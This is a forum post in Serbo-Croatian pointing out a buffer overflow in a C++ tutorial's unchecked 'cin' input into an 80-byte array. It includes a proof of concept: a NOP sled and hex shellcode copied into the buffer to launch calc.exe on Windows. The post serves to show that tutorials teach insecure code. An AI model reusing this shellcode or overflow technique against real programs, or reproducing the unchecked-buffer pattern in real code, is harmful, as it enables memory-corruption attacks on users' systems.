[ opcode @ 19.07.2006. 12:50 ] @
| Gledam malo C++ tutoriale po netu i na svakom primjeru sam nasao neki bug koji se moze exploitati.... evo banalan primjer sa http://www.cplusplus.com/doc/tutorial/ntcs.html Prvi primjer u tom tutorijalu: Code: // null-terminated sequences of characters #include <iostream> using namespace std; int main () { char question[] = "Please, enter your first name: "; char greeting[] = "Hello, "; char yourname [80]; cout << question; cin >> yourname; cout << greeting << yourname << "!"; return 0; } Naravno da se ranjiv dio vidi iz aviona.. a to je cin >> yourname; , i evo kako bi to izgledalo u Dev-C++ -u: Code: #include <iostream> using namespace std; int main () { char question[] = "Please, enter your first name: "; char greeting[] = "Hello, "; char yourname [80]; cout << question; strcpy(yourname,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x89\xE5\xC6\x45\x01\x63\xC6\x45" "\x02\x61\xC6\x45\x03\x6C\xC6\x45\x04\x63" "\x32\xE4\x88\x65\x05\x31\xC0\x40\x50\x8D" "\x45\x01\x50\xB8\x4D\x11\x86\x7C\xFF\xD0" "\x31\xC0\x50\xB8\xA2\xCA\x81\x7C\xFF\xD0" "\xF0\xFE\x22"); cout << greeting << yourname << "!"; system("PAUSE"); return 0; } Pokrene se calc.exe .. vauu  Koristio sam strcpy umjesto cin da ne moram rucno to kucat..a probao sam i sa cin i takodjer calc.exe izleti Nista strasno.. vec me samo iznerviralo kako uce ljude krivo radit programe.. |